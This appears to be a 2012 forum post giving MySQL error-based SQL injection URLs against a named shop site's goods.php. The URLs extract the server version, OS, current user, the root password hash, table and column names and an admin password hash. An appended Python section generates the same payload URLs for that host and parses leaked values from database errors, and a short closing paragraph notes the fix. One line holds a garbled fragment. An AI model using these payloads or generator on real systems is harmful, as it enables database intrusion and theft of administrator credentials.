Blind injection details

Posted 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Determine the operating system

3 [6 b9 x9 J0 R& I; nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
The user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
The password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Retrieve the admin passwd (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
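Every URL in the post above is one instance of a single template: MySQL's duplicate-key error on a GROUP BY whose key is concat(<value>, ':', floor(rand()*2)). Strictly this is error-based rather than blind injection, because the value is read straight out of the error 1062 message. The helpers below are an added example, not code from the post: they generate that template for each step shown above (version, table names, column names, a row of sansan1.ecs_admin_user), encode literals as char(...) the way the post does, and pull the leaked value out of the error text. Nothing here sends a request; the host and product id mirror the post's URLs only as string constants, the error message is a constructed sample, and the function names are this example's own.

```python
"""Helpers for the MySQL duplicate-key GROUP BY error-based injection used in
the post above. Added example; nothing here sends a request."""
import re
from urllib.parse import parse_qs, quote, urlencode, urlparse

# Host and product id copied from the post's URLs as plain string constants
# (hypothetical target for demonstration; no traffic is generated).
BASE_URL = "http://www.baiud.com/goods.php"
SEP = "0x3a"  # ':' separates the leaked value from the floor(rand()*2) digit


def mysql_char(s: str) -> str:
    """Encode a literal as MySQL char(...) so the payload contains no quotes
    (the post does this for 'root', 'sansan1' and 'ecs_admin_user')."""
    return "char(" + ",".join(str(b) for b in s.encode()) + ")"


def build_payload(inner_select: str,
                  rows_source: str = "(select 1 union select 2) a") -> str:
    """Boolean tail appended to the numeric wsid parameter.

    inner_select must return one row, one column. Its value, SEP and a
    floor(rand()*2) digit form the GROUP BY key; when MySQL meets the same key
    twice while filling the temporary table it raises error 1062
    "Duplicate entry '<value>:<digit>' for key 'group_key'" and the value
    leaks in the message. Caveat: unseeded rand() over only two rows (the
    post's default source) collides only some of the time, so a request may
    need repeating; rand(0) over three or more rows (the post's
    information_schema.tables form) collides every time.
    """
    return ("1 and (1,1)>(select count(*),concat((%s),%s,floor(rand()*2)) x "
            "from %s group by x limit 1)#" % (inner_select, SEP, rows_source))


def inner_table_name(schema: str, offset: int) -> str:
    """offset-th table of schema, 0-based as in LIMIT offset,1."""
    return ("select TABLE_NAME from information_schema.tables "
            "where TABLE_SCHEMA=%s limit %d,1" % (mysql_char(schema), offset))


def inner_column_name(schema: str, table: str, offset: int) -> str:
    """offset-th column of schema.table."""
    return ("select COLUMN_NAME from information_schema.COLUMNS "
            "where TABLE_SCHEMA=%s and TABLE_NAME=%s limit %d,1"
            % (mysql_char(schema), mysql_char(table), offset))


def inner_row(schema: str, table: str, columns, offset: int) -> str:
    """One row as col1^col2^...; ifnull() stops a NULL column from turning the
    whole concat_ws() result into NULL (the shape of the post's last URL)."""
    parts = ",".join("ifnull(cast(`%s` as char),char(32))" % c for c in columns)
    return ("select concat_ws(char(94),%s) from %s.%s limit %d,1"
            % (parts, schema, table, offset))


def build_url(payload: str, product_id: str = "352") -> str:
    """Full GET URL; quote_via=quote percent-encodes spaces as %20 as the
    post does (the default quote_plus would emit '+')."""
    return BASE_URL + "?" + urlencode({"id": product_id, "wsid": payload},
                                      quote_via=quote)


def wsid_from_url(url: str) -> str:
    """Decoded wsid parameter; '#' travels as %23 so it is not a fragment."""
    return parse_qs(urlparse(url).query)["wsid"][0]


_LEAK_RE = re.compile(r"Duplicate entry '(.*):[01]' for key '")


def parse_leak(error_text: str):
    """Leaked value from a MySQL 1062 message, or None when the query did not
    collide on this attempt (retry it) or the text is some other error."""
    m = _LEAK_RE.search(error_text)
    return m.group(1) if m else None


if __name__ == "__main__":
    steps = [
        ("version", "select @@version"),
        ("table #6 of sansan1", inner_table_name("sansan1", 6)),
        ("column #2 of ecs_admin_user",
         inner_column_name("sansan1", "ecs_admin_user", 2)),
        ("admin row",
         inner_row("sansan1", "ecs_admin_user", ["password", "user_name"], 0)),
    ]
    for label, inner in steps:
        print(label, "->", build_url(build_payload(inner)))
    # Constructed sample of what the page body would contain on a collision.
    sample = "ERROR 1062 (23000): Duplicate entry '5.1.73-log:1' for key 'group_key'"
    print("leaked:", parse_leak(sample))
```

The whole channel exists only because goods.php both concatenates wsid into SQL and echoes the raw MySQL error into the page; on the defending side, casting wsid to an integer or binding it as a prepared-statement parameter removes the injection, and not rendering database errors to the client removes the leak even where some other injection remains.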